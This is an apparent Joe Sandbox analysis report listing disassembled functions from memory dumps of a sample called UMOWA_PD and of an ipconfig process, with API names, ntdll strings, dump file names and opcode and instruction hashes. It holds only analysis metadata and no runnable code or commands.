                                                                                    Function 33C99046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$@
                                                                                    • API String ID: 3446177414-1194432280
                                                                                    • Opcode ID: e28ed55093f9279acfe97d92cf9f44f9a4300ebd59ffd6008eccb2dbf390f570
                                                                                    • Instruction ID: 28bfe754fafca1aa6f0a5254239ee66541fcb1244621b405c86ab1c36d076942
                                                                                    • Opcode Fuzzy Hash: e28ed55093f9279acfe97d92cf9f44f9a4300ebd59ffd6008eccb2dbf390f570
                                                                                    • Instruction Fuzzy Hash: 648128B6D006699BDB25CF54CC44BDEB7B8AF08710F0141EAA919FB240E7719E858FA0
                                                                                    Function 33CC4C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 33D0344A, 33D03476
                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 33D03466
                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 33D03439
                                                                                    • LdrpFindDllActivationContext, xrefs: 33D03440, 33D0346C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                    • API String ID: 3446177414-3779518884
                                                                                    • Opcode ID: 2998f692b6f379fbf49ffd485cc996e6b16fc6105a84863f0dbc92975d1aa4b3
                                                                                    • Instruction ID: c446e58976f287ae3e561855d17bfa0187b1f709a9934c9079adb0718fc88eec
                                                                                    • Opcode Fuzzy Hash: 2998f692b6f379fbf49ffd485cc996e6b16fc6105a84863f0dbc92975d1aa4b3
                                                                                    • Instruction Fuzzy Hash: 2731D9B6A013D1BFF713AB05C884AD972A8FB01794F4AC166D846EF571D7A0DCC2C691
                                                                                    Function 33C8F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 3446177414-3610490719
                                                                                    • Opcode ID: dbc79f24b32cf166da4156a5d6af6fba0ced2bc6e524dae05d87e94e44980d75
                                                                                    • Instruction ID: 3453a728ab057680916b5d66e8b7b9ce55b6d54db1c850c60581d99b73f8b25c
                                                                                    • Opcode Fuzzy Hash: dbc79f24b32cf166da4156a5d6af6fba0ced2bc6e524dae05d87e94e44980d75
                                                                                    • Instruction Fuzzy Hash: EC915871704B50EFE305DB24D840B5EB3A9FF44B88F050659E890DF691DB34EA42CB92
                                                                                    Function 33CB0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • LdrpCheckModule, xrefs: 33CF9F24
                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 33CF9F1C
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 33CF9F2E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-161242083
                                                                                    • Opcode ID: c716f38895ee680af3b5dcda1a39342517d017cd2b13cfeec1ba9e29abcd260e
                                                                                    • Instruction ID: 41a0002d20c24c7494d34424d41931ba7a4b81e940855e8f773d0f91da737e49
                                                                                    • Opcode Fuzzy Hash: c716f38895ee680af3b5dcda1a39342517d017cd2b13cfeec1ba9e29abcd260e
                                                                                    • Instruction Fuzzy Hash: 6D71EF75E007059FEF04EF68C890AAEB7F4EF44308F094469E946EB651EB34AA42CB50
                                                                                    Function 33CBEE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7bc87d64c1779c4af2f5f1ad825c426db010178f6e771863085c4b0f1ce50df5
                                                                                    • Instruction ID: 498e2536470547bc47518203fefc51e7567e5b82ad4c05fe6f7d5566325cce3d
                                                                                    • Opcode Fuzzy Hash: 7bc87d64c1779c4af2f5f1ad825c426db010178f6e771863085c4b0f1ce50df5
                                                                                    • Instruction Fuzzy Hash: 2EE1CB75D00708DFDB25CFA9D980A8DBBF5BF48344F244A2AE586EB660DB71A941CF10
                                                                                    Function 33C958E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 02485f4dc3e23a2bc7314662c62adfd05ba19e3514cc9320423d4044e1eb17d6
                                                                                    • Instruction ID: 0ccc482eccbf13883746a509232964ae02e90c74e812971bd59547a7c15f0a23
                                                                                    • Opcode Fuzzy Hash: 02485f4dc3e23a2bc7314662c62adfd05ba19e3514cc9320423d4044e1eb17d6
                                                                                    • Instruction Fuzzy Hash: 0D324474D007699FEB21CF64C984BD9BBB4BF08314F0640E9D549EB682DB759A88CF90
                                                                                    Function 33CC4B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0$Flst
                                                                                    • API String ID: 0-758220159
                                                                                    • Opcode ID: ff778c8ad92cc713c5685178a2544cb5865743f97398152009942e9437534485
                                                                                    • Instruction ID: 3175842f89850dc062bc8a1ac808b16ef5bbf04058b52adcfa06a59f9e3c5b26
                                                                                    • Opcode Fuzzy Hash: ff778c8ad92cc713c5685178a2544cb5865743f97398152009942e9437534485
                                                                                    • Instruction Fuzzy Hash: DB516BB5E007888BEB26CF95C484699FBF8FF44B95F18C069D046DB654EB709986CB80
                                                                                    Function 33C8DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: 0$0
                                                                                    • API String ID: 3446177414-203156872
                                                                                    • Opcode ID: 609a8957354230790836e780f6ad2610bd4726a7555b783ac6b7bdc752d41eb9
                                                                                    • Instruction ID: d5b6978df5c3cde4ee9cafe8f76818d240112cd8ad49cabb4578e2d81ce2dcae
                                                                                    • Opcode Fuzzy Hash: 609a8957354230790836e780f6ad2610bd4726a7555b783ac6b7bdc752d41eb9
                                                                                    • Instruction Fuzzy Hash: 4F415DB6A087029FD300CF28C854A5ABBE4BF89358F04496EF588DF750D771EA45CB96

                                                                                    Execution Graph

                                                                                    Execution Coverage:0.2%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:9
                                                                                    Total number of Limit Nodes:1
                                                                                    execution_graph 64420 3262b20 64422 3262b2a 64420->64422 64423 3262b31 64422->64423 64424 3262b3f LdrInitializeThunk 64422->64424 64426 32629f0 LdrInitializeThunk 64441 30ef177 64442 30ef18c 64441->64442 64443 30ef1a9 NtQueryInformationProcess 64442->64443 64444 30ef1e3 64443->64444

                                                                                    Executed Functions

                                                                                    Function 030EF177 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 414nativeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • NtQueryInformationProcess.NTDLL ref: 030EF1C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061858287.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_30e0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InformationProcessQuery
                                                                                    • String ID: 0
                                                                                    • API String ID: 1778838933-4108050209
                                                                                    • Opcode ID: 219a842e0bafdb5871df4d554e028e84cf6f2513721f5c6492a0015cbdede274
                                                                                    • Instruction ID: f7ac9a9f36bec08450720541f4d155e47f61f59ac56697deea23a0805c974b53
                                                                                    • Opcode Fuzzy Hash: 219a842e0bafdb5871df4d554e028e84cf6f2513721f5c6492a0015cbdede274
                                                                                    • Instruction Fuzzy Hash: 6EE13974619B8C8FCBA5EF68C894AEE77A1FB99300F00062AD94ADB644DF34D6418B41
                                                                                    Function 03264260 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 229502030aa41f4dbbcb95347de560dec0e63287d32aa904b05f49a37d7475e5
                                                                                    • Instruction ID: 7b63961e580cac2c165017d870769d636a651f86f25a3796dbdc18aa4250270b
                                                                                    • Opcode Fuzzy Hash: 229502030aa41f4dbbcb95347de560dec0e63287d32aa904b05f49a37d7475e5
                                                                                    • Instruction Fuzzy Hash: B0900231615418129640B15859895464046A7E0301B51C415E0514554CDB3489966361
                                                                                    Function 03264570 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ffa0089bf97d16632ae3a66f148448205a15536641be0639e4da2574c2b5d7fa
                                                                                    • Instruction ID: 9a28bb96798b6338f49b8759595b578f22ad5593f670fde7d50242944b39542a
                                                                                    • Opcode Fuzzy Hash: ffa0089bf97d16632ae3a66f148448205a15536641be0639e4da2574c2b5d7fa
                                                                                    • Instruction Fuzzy Hash: 6F900261611118424640B15859094066046A7E1301391C519A0644560CD7388895A269
                                                                                    Function 032634E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2a4dbdd6bf100dc3dd519b593e70a177073a18216203accd2f2c7fa9d953633e
                                                                                    • Instruction ID: f4fc020625df3f3b885df6b68b6e2bec320c9dcd33d0b0ea6987384c14dce800
                                                                                    • Opcode Fuzzy Hash: 2a4dbdd6bf100dc3dd519b593e70a177073a18216203accd2f2c7fa9d953633e
                                                                                    • Instruction Fuzzy Hash: 5590023161511C02D600A1585619706104697D0201F61C815A0514568DD7B5899175A2
                                                                                    Function 03262B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 118 3262b80-3262b8c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 24b6a8e4c1b326fcfb308e0d68336ee228775c96def9b6f5db43add2bc585bbc
                                                                                    • Instruction ID: 5ab381ebff2d01b09a31775f9316a3783fcb584043f5dd89395dd488af6f3e26
                                                                                    • Opcode Fuzzy Hash: 24b6a8e4c1b326fcfb308e0d68336ee228775c96def9b6f5db43add2bc585bbc
                                                                                    • Instruction Fuzzy Hash: 0390023121101C42D600A1585509B46004697E0301F51C41AA0214654DD735C8917521
                                                                                    Function 03262B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 119 3262b90-3262b9c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8711e98ecc01b28cf6da954f6ea1ca1acfd70cf9860aa6f5fdcc249b908dc3df
                                                                                    • Instruction ID: 1b933ce5e24f82370ae45ab9d9aeb16e28b0dfc5117a9d02c6bf5ee83aa963d0
                                                                                    • Opcode Fuzzy Hash: 8711e98ecc01b28cf6da954f6ea1ca1acfd70cf9860aa6f5fdcc249b908dc3df
                                                                                    • Instruction Fuzzy Hash: AE90023121109C02D610A158950974A004697D0301F55C815A4514658DD7B588D17121
                                                                                    Function 03262BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 120 3262bc0-3262bcc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ba2f2aef59f1d044efaedaa78c469591f73463bc1ead99836d79470a4ffd89c7
                                                                                    • Instruction ID: cf6c8e6da875c0240f32b70ef3e67f96e105231e35853c1395898e7422be3723
                                                                                    • Opcode Fuzzy Hash: ba2f2aef59f1d044efaedaa78c469591f73463bc1ead99836d79470a4ffd89c7
                                                                                    • Instruction Fuzzy Hash: B090023121101C02D600A598650D646004697E0301F51D415A5114555ED77588D17131
                                                                                    Function 03262A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 116 3262a10-3262a1c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 53e4b5874f6474595f7e90edc5c740f9dd6dadac2737856d4197f5c254521e41
                                                                                    • Instruction ID: 3a1e7b2f4327409d76bd5ba57923e87e63da9712cd1c908da65171b8d9478478
                                                                                    • Opcode Fuzzy Hash: 53e4b5874f6474595f7e90edc5c740f9dd6dadac2737856d4197f5c254521e41
                                                                                    • Instruction Fuzzy Hash: 45900225231018020645E558170950B0486A7D6351391C419F1506590CD73188A56321
                                                                                    Function 03262A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 117 3262a80-3262a8c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0aa2679b2f55c449ba1eb9f862a36d4bf622a3a91f7ebe0e179e57c52921c6f6
                                                                                    • Instruction ID: 1ba7d85badf14c1a2d713598728ac7b9e00bd8d3adf76d97198613466da786a0
                                                                                    • Opcode Fuzzy Hash: 0aa2679b2f55c449ba1eb9f862a36d4bf622a3a91f7ebe0e179e57c52921c6f6
                                                                                    • Instruction Fuzzy Hash: 18900261212018034605B1585519616404B97E0201B51C425E1104590DD63588D17125
                                                                                    Function 032629F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 115 32629f0-32629fc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a6403b4fd3ced86340f24290c7ed203beebf59ddfa2dabf15862e4b01389c200
                                                                                    • Instruction ID: 45b0df738a355f98516515f8a0ccc1b3caa38efc90c402fe6597edd86e67ff92
                                                                                    • Opcode Fuzzy Hash: a6403b4fd3ced86340f24290c7ed203beebf59ddfa2dabf15862e4b01389c200
                                                                                    • Instruction Fuzzy Hash: F3900225221018030605E5581709507008797D5351351C425F1105550CE73188A16121
                                                                                    Function 032638D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 9fa0f60064bf4b4c79933d1fc6eff7406c9ab2e94347dca6594c4a9f6a087aaa
                                                                                    • Instruction ID: 23f34ac69899691c4ab1c4583e42587a382f4a82d254447e2319737bc3f7cac7
                                                                                    • Opcode Fuzzy Hash: 9fa0f60064bf4b4c79933d1fc6eff7406c9ab2e94347dca6594c4a9f6a087aaa
                                                                                    • Instruction Fuzzy Hash: 0390022125506902D650B15C55096164046B7E0201F51C425A0904594DD67588957221
                                                                                    Function 03262F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 3fe1a426528691c5dcd1beaca667e4a2b8693dd7097b61bcdb90a90a65097de9
                                                                                    • Instruction ID: 43b496923790e64e3cb41a46f680502a61d17a408a781e9d55676e3fab3e1178
                                                                                    • Opcode Fuzzy Hash: 3fe1a426528691c5dcd1beaca667e4a2b8693dd7097b61bcdb90a90a65097de9
                                                                                    • Instruction Fuzzy Hash: ED90022122181842D700A5685D19B07004697D0303F51C519A0244554CDA3588A16521
                                                                                    Function 03262E00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 125 3262e00-3262e0c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b242725167cf2da7d2fea63a4eb29ad20dea4ffdda3e366547a5b24629039ee0
                                                                                    • Instruction ID: 2ce7566357454783c506306a8af548f8334d7d78fb001100d3727aacea9a6607
                                                                                    • Opcode Fuzzy Hash: b242725167cf2da7d2fea63a4eb29ad20dea4ffdda3e366547a5b24629039ee0
                                                                                    • Instruction Fuzzy Hash: 8790026121141C03D640A5585909607004697D0302F51C415A2154555EDB398C917135
                                                                                    Function 03262E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 126 3262e50-3262e5c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
